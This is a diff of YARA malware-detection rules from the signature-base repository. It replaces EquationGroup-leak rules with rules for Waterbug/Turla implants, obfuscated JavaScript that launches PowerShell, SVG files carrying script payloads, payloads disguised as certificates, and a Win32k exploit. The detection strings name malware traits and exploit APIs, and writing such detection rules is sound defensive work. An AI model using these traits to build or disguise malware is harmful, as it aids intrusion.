-		hash1 = "04ccc060d401ddba674371e66e0288ebdbfa7df74b925c5c202109f23fb78504"
+		tags = ""
 
 	strings:
-		$s1 = "USAGE: SetOurAddr <input file> <output file> <protocol> [IP/IPX address]" fullword ascii
-		$s2 = "Replaced default IP address (127.0.0.1) with Local IP Address %d.%d.%d.%d" fullword ascii
+		$string1 = "/%s?rank=%s"
+		$string2 = "ModuleStart\x00ModuleStop\x00start"
+		$string3 = "1156fd22-3443-4344-c4ffff"
+		$string4 = "read\x20file\x2E\x2E\x2E\x20error\x00\x00"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+		2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Getadmin_LSADUMP_Modifyprivilege_Implant : FILE
+rule SIGNATURE_BASE_Waterbug_Wipbot_2013_Core : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b3fda153-563c-5a5c-9f5c-12d6ef8b3d95"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2860-L2882"
+		description = "Symantec Waterbug Attack - Trojan.Wipbot core + core; garbage appended data (PDF Exploit leftovers) + wipbot dropper; fake AdobeRd32 Error"
+		author = "Symantec Security Response"
+		id = "2e8ccce9-d8ba-573d-b532-76d8e2ed5442"
+		date = "2015-01-22"
+		modified = "2023-01-27"
+		reference = "http://t.co/rF35OaAXrl"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_waterbug.yar#L34-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ee5c818c29ccb1b280669f7f5e828963c4523b73b68674d8c0aae72189f0208c"
+		logic_hash = "59e1363225b1f7765e953e3d6803270b82f4268431d92ef00ed1010df0793e5f"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c8b354793ad5a16744cf1d4efdc5fe48d5a0cf0657974eb7145e0088fcf609ff"
-		hash2 = "5f06ec411f127f23add9f897dc165eaa68cbe8bb99da8f00a4a360f108bb8741"
 
 	strings:
-		$s1 = "\\system32\\win32k.sys" wide
-		$s2 = "hKeAddSystemServiceTable" fullword ascii
-		$s3 = "hPsDereferencePrimaryToken" fullword ascii
-		$s4 = "CcnFormSyncExFBC" fullword wide
-		$s5 = "hPsDereferencePrimaryToken" fullword ascii
-		$op1 = { 0c 2b ca 8a 04 11 3a 02 75 01 47 42 4e 75 f4 8b }
-		$op2 = { 14 83 c1 05 80 39 85 75 0c 80 79 01 c0 75 06 80 }
-		$op3 = { eb 3d 83 c0 06 33 f6 80 38 ff 75 2c 80 78 01 15 }
+		$code1 = { 89 47 0C C7 47 10 90 C2 04 00 C7 47 14 90 C2 10 00 C7 47 18 90 90 60 68 89 4F 1C C7 47 20 90 90 90 B8 89 4F 24 C7 47 28 90 FF D0 61 C7 47 2C 90 C2 04 00}
+		$code2 = { 85 C0 75 25 8B 0B BF ?? ?? ?? ?? EB 17 69 D7 0D 66 19 00 8D BA 5F F3 6E 3C 89 FE C1 EE 10 89 F2 30 14 01 40 3B 43 04 72 E4}
+		$code3 = {90 90 90 ?? B9 00 4D 5A 90 00 03 00 00 00 82 04}
+		$code4 = {55 89 E5 5D C3 55 89 E5 83 EC 18 8B 45 08 85 C0}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and ( 4 of ( $s* ) or all of ( $op* ) ) )
+		uint16( 0 ) == 0x5A4D and ( ( $code1 or $code2 ) or ( $code3 and $code4 ) )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Sendpktrigger : FILE
+rule SIGNATURE_BASE_Waterbug_Turla_Dropper
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6cbf95eb-323c-53a3-9aca-222626add4dc"
-		date = "2017-04-15"
+		description = "Symantec Waterbug Attack - Trojan Turla Dropper"
+		author = "Symantec Security Response"
+		id = "f9683ac7-36f3-5a2a-8b76-e8e2527f4e0d"
+		date = "2015-01-22"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2884-L2897"
+		reference = "http://t.co/rF35OaAXrl"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_waterbug.yar#L50-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "277367e69406a84ff4ff6b57d05bf97468b0083e23f9c5cd14cdd26cad5846d7"
+		logic_hash = "6836b8d28fb41d9459f24d22e3c428b022b26885b7dce1caa5b0d5a7a1b7f82b"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2f9c7a857948795873a61f4d4f08e1bd0a41e3d6ffde212db389365488fa6e26"
+		tags = ""
 
 	strings:
-		$x1 = "----====**** PORT KNOCK TRIGGER BEGIN ****====----" fullword wide
+		$a = {0F 31 14 31 20 31 3C 31 85 31 8C 31 A8 31 B1 31 D1 31 8B 32 91 32 B6 32 C4 32 6C 33 AC 33 10 34}
+		$b = {48 41 4C 2E 64 6C 6C 00 6E 74 64 6C 6C 00 00 00 57 8B F9 8B 0D ?? ?? ?? ?? ?? C9 75 26 56 0F 20 C6 8B C6 25 FF FF FE FF 0F 22 C0 E8}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Dmgz_Target_2 : FILE
+rule SIGNATURE_BASE_Waterbug_Fa_Malware : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "426e982c-2380-5801-ba80-ab25ec4c0f74"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2899-L2916"
+		description = "Symantec Waterbug Attack - FA malware variant"
+		author = "Symantec Security Response"
+		id = "b09f798a-2875-59ca-b880-971d8f973c76"
+		date = "2015-01-22"
+		modified = "2023-01-27"
+		reference = "http://t.co/rF35OaAXrl"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_waterbug.yar#L64-L81"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ab9ab949ee17655e424f6a65d3605e9900d214d1c620e051104762d5c214419f"
+		logic_hash = "b3ac0d69551f27c7f81e24eb00e110639d4b31c8581dfee82715d65528b09632"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "55ac29b9a67e0324044dafaba27a7f01ca3d8e4d8e020259025195abe42aa904"
 
 	strings:
-		$s1 = "\\\\.\\%ls" fullword ascii
-		$op0 = { e8 ce 34 00 00 b8 02 00 00 f0 e9 26 02 00 00 48 }
-		$op1 = { 8b 4d 28 e8 02 05 00 00 89 45 34 eb 07 c7 45 34 }
-		$op2 = { e8 c2 34 00 00 90 48 8d 8c 24 00 01 00 00 e8 a4 }
+		$string1 = "C:\\proj\\drivers\\fa _ 2009\\objfre\\i386\\atmarpd.pdb"
+		$string2 = "d:\\proj\\cn\\fa64\\"
+		$string3 = "sengoku_Win32.sys\x00"
+		$string4 = "rk_ntsystem.c"
+		$string5 = "\\uroboros\\"
+		$string6 = "shell.{F21EDC09-85D3-4eb9-915F-1AFA2FF28153}"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+		uint16( 0 ) == 0x5A4D and ( any of ( $string* ) )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Mstcp32_DXGHLP16_Tdip : FILE
+rule SIGNATURE_BASE_Waterbug_Sav : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5b54e68b-7bf3-59a0-8257-c370a3b9e4db"
-		date = "2017-04-15"
-		modified = "2023-01-06"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2918-L2938"
+		description = "Symantec Waterbug Attack - SAV Malware"
+		author = "Symantec Security Response"
+		id = "685849de-9892-56bf-8215-21b08d8b2d7c"
+		date = "2015-01-22"
+		modified = "2023-01-27"
+		reference = "http://t.co/rF35OaAXrl"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_waterbug.yar#L114-L129"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "35fab86ca4cb287c8046a1764a91523673e12b5729d87c90b0c298dcbfcf86eb"
+		logic_hash = "c8622ac6cb1f0b9965fe6ee1a4860f19d8b0dc1c586e2a3771420b8d78648066"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "26215bc56dc31d2466d72f1f4e1b6388e62606e9949bc41c28968fcb9a9d60a6"
-		hash2 = "fcfb56fa79d2383d34c471ef439314edc2239d632a880aa2de3cea430f6b5665"
-		hash3 = "a5ec4d102d802ada7c5083af53fd9d3c9b5aa83be9de58dbb4fac7876faf6d29"
 
 	strings:
-		$s1 = "\\Registry\\User\\CurrentUser\\" wide
-		$s2 = "\\DosDevices\\%ws" wide
-		$s3 = "\\Device\\%ws_%ws" wide
-		$s4 = "sys\\mstcp32.dbg" fullword ascii
-		$s5 = "%ws%03d%ws%wZ" fullword wide
-		$s6 = "TCP/IP driver" fullword wide
+		$code1a = { 8B 75 18 31 34 81 40 3B C2 72 F5 33 F6 39 7D 14 76 1B 8A 04 0E 88 04 0F 6A 0F 33 D2 8B C7 5B F7 F3 85 D2 75 01 }
+		$code1b = { 8B 45 F8 40 89 45 F8 8B 45 10 C1 E8 02 39 45 F8 73 17 8B 45 F8 8B 4D F4 8B 04 81 33 45 20 8B 4D F8 8B 55 F4 89 04 8A EB D7 83 65 F8 00 83 65 EC 00 EB 0E 8B 45 F8 40 89 45 F8 8B 45 EC 40 89 45 EC 8B 45 EC	3B 45 10 73 27 8B 45 F4 03 45 F8 8B 4D F4 03 4D EC 8A 09 88 08 8B 45 F8 33 D2 6A 0F 59 F7 F1 85 D2 75 07 }
+		$code1c = { 8A 04 0F 88 04 0E 6A 0F 33 D2 8B C6 5B F7 F3 85 D2 75 01 47 8B 45 14 46 47 3B F8 72 E3 EB 04 C6 04 08 00 48 3B C6 73 F7 33 C0 C1 EE 02 74 0B 8B 55 18 31 14 81 40 3B C6 72 F5 }
+		$code2 = { 29 5D 0C 8B D1 C1 EA 05 2B CA 8B 55 F4 2B C3 3D 00 00 00 01 89 0F 8B 4D 10 8D 94 91 00 03 00 00 73 17 8B 7D F8 8B 4D 0C 0F B6 3F C1 E1 08 0B CF C1 E0 08 FF 45 F8 89 4D 0C 8B 0A 8B F8 C1 EF 0B}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 4 of them )
+		uint16( 0 ) == 0x5A4D and ( ( $code1a or $code1b or $code1c ) and $code2 )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Regprobe : FILE
+rule SIGNATURE_BASE_Malware_JS_Powershell_Obfuscated : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Unspecified malware - file rechnung_3.js"
 		author = "Florian Roth (Nextron Systems)"
-		id = "184618b7-a24c-5a8c-9fb2-a5a07f1a0299"
-		date = "2017-04-15"
+		id = "7995dd3a-5942-5c48-9e50-64f4964249a7"
+		date = "2017-03-24"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2940-L2955"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_javascript_powershell.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "01e7387c26ae3736c8fac1a3bb6ff283f8b06949af7a4ac36a556b292412bda2"
+		logic_hash = "1dd745624971f10acb7911433f363b0cf20c8c45344f702d7f3549c58689b371"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "99a42440d4cf1186aad1fd09072bd1265e7c6ebbc8bcafc28340b4fe371767de"
+		hash1 = "3af15a2d60f946e0c4338c84bd39880652f676dc884057a96a10d7f802215760"
 
 	strings:
-		$x1 = "Usage: %s targetIP protocolSequence portNo [redirectorIP] [CLSID]" fullword ascii
-		$x2 = "key does not exist or pinging w2k system" fullword ascii
-		$x3 = "RpcProxy=255.255.255.255:65536" fullword ascii
+		$x1 = "po\" + \"wer\" + \"sh\" + \"e\" + \"ll\";" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+		filesize < 30KB and 1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Doublefeaturedll_Dll_2 : FILE
+rule SIGNATURE_BASE_SUSP_SVG_JS_Payload_Mar25 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f77fd49f-815b-5fb9-a3d7-8721edf79b28"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2957-L2974"
+		description = "Detects a suspicious SVG file that contains a JavaScript payload. This rule is a generic rule that might generate false positives. A match should be further investigated."
+		author = "Florian Roth"
+		id = "cdb22283-8427-5c25-b653-d6d76dd27dc6"
+		date = "2025-03-20"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_svg_js_phish_mar25.yar#L3-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0d6751ebfb2541c86b74583b7867de0a193ca106bf77337c8b10f15cdeb596bd"
-		score = 75
+		hash = "7b4b8e42d4df56412969cd1c38dcb750d21b10a54d257a9b918bd6ae0e0f8d11"
+		hash = "4ae2ebc103f5de7ccfd75603b543d602b5c793e1ef7db19fbb60ff2e42611f75"
+		hash = "b92e9d6f8a516e78b3e848c4b5b2815b406c9478e6be3777f3e784ceedc66f4a"
+		hash = "23ea832d503b02e9edbdbf9ed8ce0b19376d44580d21906d9da834de69f7dfcb"
+		hash = "4f33dff59753773a596798ee58fb899c5382c6ec2951b457554aebe5c05ec0cd"
+		hash = "b8be8e009b08c04857dc2388544d61db57c0dd1841371aa7e4bf3ee2010ef1a8"
+		hash = "cdcbe23f284067c4e863f76370f8612d85bef0410ca0bb5684112a8c16eff21c"
+		hash = "5b3d11109e0d10b9266cbfbb6906e728c4470d752f95769280666d1166df4b43"
+		hash = "a7620155da2a576823dbe7963ff4a5f79702645edb8b2ae67b8af8ba7eac697b"
+		hash = "52e1c6279dc151616bbd85ac7d0abc42cab5850deb6da2e2b20e339f79c3536a"
+		logic_hash = "a9239fd09b656f985b3f930ba7b3ab3999dfcd315010f3bf648fffd5ed0a8834"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f265defd87094c95c7d3ddf009d115207cd9d4007cf98629e814eda8798906af"
-		hash2 = "8d62ca9e6d89f2b835d07deb5e684a576607e4fe3740f77c0570d7b16ebc2985"
-		hash3 = "634a80e37e4b32706ad1ea4a2ff414473618a8c42a369880db7cc127c0eb705e"
 
 	strings:
-		$s1 = ".dllfD" fullword ascii
-		$s2 = "Khsppxu" fullword ascii
-		$s3 = "D$8.exe" fullword ascii
+		$a1 = "<svg xmlns=" ascii fullword
+		$sx1 = "src=\"data:application/ecmascript;base64,"
+		$sx2 = "=\"></script>"
+		$ss1 = "<script type=\"application/ecmascript\">"
+		$ss2 = "<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"100%\" height=\"100%\">"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them )
+		$a1 in ( 0 .. 1024 ) and ( filesize < 100KB and 1 of ( $sx* ) or filesize < 1MB and 2 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Gangsterthief_Implant : FILE
+rule SIGNATURE_BASE_SUSP_Certificate_Payload : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9127f280-135e-5f83-9587-eab3ad84ad69"
-		date = "2017-04-15"
+		description = "Detects payloads that pretend to be certificates"
+		author = "Didier Stevens, Florian Roth"
+		id = "6f1fe410-591a-5a59-a683-67cad9777dfe"
+		date = "2018-08-02"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2976-L2993"
+		reference = "https://blog.nviso.be/2018/08/02/powershell-inside-a-certificate-part-3/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cert_payloads.yar#L1-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c8145d6eedf20cf95baf329a6240b5b740273ff0a7f82edd3c346eb8c67e69e1"
-		score = 75
+		logic_hash = "909cf4209bbb876a042d86e017f65ce3764d2fde7a602406ed8531ba97c9fb9b"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "50b269bda5fedcf5a62ee0514c4b14d48d53dd18ac3075dcc80b52d0c2783e06"
 
 	strings:
-		$s1 = "\\\\.\\%s:" fullword wide
-		$s4 = "raw_open CreateFile error" fullword ascii
-		$s5 = "-PATHDELETED-" ascii
-		$s6 = "(deleted)" fullword wide
-		$s8 = "NULLFILENAME" fullword ascii
+		$re1 = "-----BEGIN CERTIFICATE-----"
+		$fp1 = "replace it with the PEM-encoded root certificate"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them )
+		uint32( 0 ) == 0x2D2D2D2D and $re1 at 0 and not uint8( 29 ) == 0x4D and not uint8( 28 ) == 0x4D and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Setcallbackports : FILE
+rule SIGNATURE_BASE_ACE_Containing_EXE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3c06fc74-2e75-5348-bb62-30c724de1414"
-		date = "2017-04-15"
+		description = "Looks for ACE Archives containing an exe/scr file"
+		author = "Florian Roth (Nextron Systems) - based on Nick Hoffman' rule - Morphick Inc"
+		id = "0756f0e7-39f1-572d-a77d-1f7826332360"
+		date = "2015-09-09"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2995-L3009"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_ace_with_exe.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e087534589228ac1af8b8b8d2ebbc1bc99fc25b38cb4c4d840cab8e90e75644a"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "16f66c2593665c2507a78f96c0c2a9583eab0bda13a639e28f550c92f9134ff0"
+		logic_hash = "27fba0db7a98fbaf4b3710a9e411ed74860099c133a2e83ddf368ae2fef3c288"
+		score = 50
+		quality = 83
+		tags = ""
 
 	strings:
-		$s1 = "USAGE: %s <input file> <output file> <port1> [port2] [port3] [port4] [port5] [port6]" fullword ascii
-		$s2 = "You may enter between 1 and 6 ports to change the defaults." fullword ascii
+		$header = { 2a 2a 41 43 45 2a 2a }
+		$extensions1 = ".exe"
+		$extensions2 = ".EXE"
+		$extensions3 = ".scr"
+		$extensions4 = ".SCR"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+		$header at 7 and for any of ( $extensions* ) : ( $ in ( 81 .. ( 81 + uint16( 79 ) ) ) )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Diba_Target_BH_2000 : FILE
+rule SIGNATURE_BASE_EXT_APT_Bitter_Win32K_0Day_Feb21 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b02fa407-e6f1-5c2d-a587-7edb55dbe0a5"
-		date = "2017-04-15"
+		description = "Detects code that exploits a Windows 0day exploited by Bitter APT group"
+		author = "dbappsecurity_lieying_lab"
+		id = "b1892b52-4b94-5571-ad63-8750a321f1f2"
+		date = "2021-01-01"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3011-L3025"
+		reference = "https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bitter.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0cd3ba351b1c5716ed322c9f177a848322324526f3d39c2be5cc34bc6aee9fa6"
+		logic_hash = "84a8d0ae14469eb6431e73295d821609c7a8b313630d645085ffd8faff6e5e43"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0654b4b8727488769390cd091029f08245d690dd90d1120e8feec336d1f9e788"
 
 	strings:
-		$s2 = "0M1U1Z1p1" fullword ascii
-		$s14 = "SPRQWV" fullword ascii
+		$s1 = "NtUserConsoleControl" ascii wide
+		$s2 = "NtCallbackReturn" ascii wide
+		$s3 = "CreateWindowEx" ascii wide
+		$s4 = "SetWindowLong" ascii wide
+		$a1 = {48 C1 E8 02 48 C1 E9 02 C7 04 8A}
+		$a2 = {66 0F 1F 44 00 00 80 3C 01 E8 74 22 FF C2 48 FF C1}
+		$a3 = {48 63 05 CC 69 05 00 8B 0D C2 69 05 00 48 C1 E0 20 48 03 C1}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		uint16( 0 ) == 0x5a4d and all of ( $s* ) and 1 of ( $a* )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Rc5 : FILE
+rule SIGNATURE_BASE_MAL_Winnti_BR_Report_Twinpeaks : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "854c1726-4ba4-5464-a765-4dd154a1b166"
-		date = "2017-04-15"
+		description = "Detects Winnti samples"
+		author = "@br_data repo"
+		id = "2e4e2b88-fdb4-5adc-8192-a304d71ca851"
+		date = "2019-07-24"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3027-L3043"
+		reference = "https://github.com/br-data/2019-winnti-analyse"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_br.yar#L3-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6d9ba73fe2a6da99ba44b00bcb5ecf51e983ac245fd5c6e620d35e8120514464"
+		logic_hash = "76457f5aa4cc4bf4f43ffbaa60d63006455977e881f1d74b845835c505a93fed"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "69e2c68c6ea7be338497863c0c5ab5c77d5f522f0a84ab20fe9c75c7f81318eb"
 
 	strings:
-		$s1 = "Usage: %s [d|e] session_key ciphertext" fullword ascii
-		$s2 = "where session_key and ciphertext are strings of hex" fullword ascii
-		$s3 = "d = decrypt mode, e = encrypt mode" fullword ascii
-		$s4 = "Bad mode, should be 'd' or 'e'" fullword ascii
+		$cooper = "Cooper"
+		$pattern = { e9 ea eb ec ed ee ef f0}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+		uint16( 0 ) == 0x5a4d and $cooper and ( $pattern in ( @cooper [ 1 ] .. @cooper [ 1 ] + 100 ) )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_PC_Level_Generic : FILE
+
+rule SIGNATURE_BASE_MAL_BR_Report_Thedao : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7ff3d0b0-7a70-561e-9c45-d1f9dbccefe9"
-		date = "2017-04-15"
+		description = "Detects indicator in malicious UPX packed samples"
+		author = "@br_data repo"
+		id = "5cc932d7-2ec6-5570-af4a-3f64b39e6db5"
+		date = "2019-07-24"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3045-L3075"
+		reference = "https://github.com/br-data/2019-winnti-analyse"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_br.yar#L17-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ddb3441b62b477ab7e3406a22e2a246b60c1d1d25e4acf52ee452a2dfac2daf7"
+		logic_hash = "798b092b7667462aa66590603504cb0cd1166e4ac3472627cd8cd8fdf8f0b778"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7a6488dd13936e505ec738dcc84b9fec57a5e46aab8aff59b8cfad8f599ea86a"
-		hash2 = "0e3cfd48732d0b301925ea3ec6186b62724ec755ed40ed79e7cd6d3df511b8a0"
-		hash3 = "d1d6e3903b6b92cc52031c963e2031b5956cadc29cc8b3f2c8f38be20f98a4a7"
-		hash4 = "25a2549031cb97b8a3b569b1263c903c6c0247f7fff866e7ec63f0add1b4921c"
-		hash5 = "591abd3d7ee214df25ac25682b673f02219da108d1384261052b5167a36a7645"
-		hash6 = "6b71db2d2721ac210977a4c6c8cf7f75a8f5b80b9dbcece1bede1aec179ed213"
-		hash7 = "7be4c05cecb920f1010fc13086635591ad0d5b3a3a1f2f4b4a9be466a1bd2b76"
-		hash8 = "f9cbccdbdf9ffd2ebf1ee84d0ddddd24a61dbe0858ab7f0131bef6c7b9a19131"
-		hash9 = "3cf7a01bdf8e73769c80b75ca269b506c33464d81f574ded8bb20caec2d4cd13"
-		hash10 = "a87a871fe32c49862ed68fda99d92efd762a33ababcd9b6b2b909f2e01f59c16"
 
 	strings:
-		$s1 = "wshtcpip.WSHGetSocketInformation" fullword ascii
-		$s2 = "\\\\.\\%hs" fullword ascii
-		$s3 = ".?AVResultIp@Mini_Mcl_Cmd_NetConnections@@" fullword ascii
-		$s4 = "Corporation. All rights reserved." fullword wide
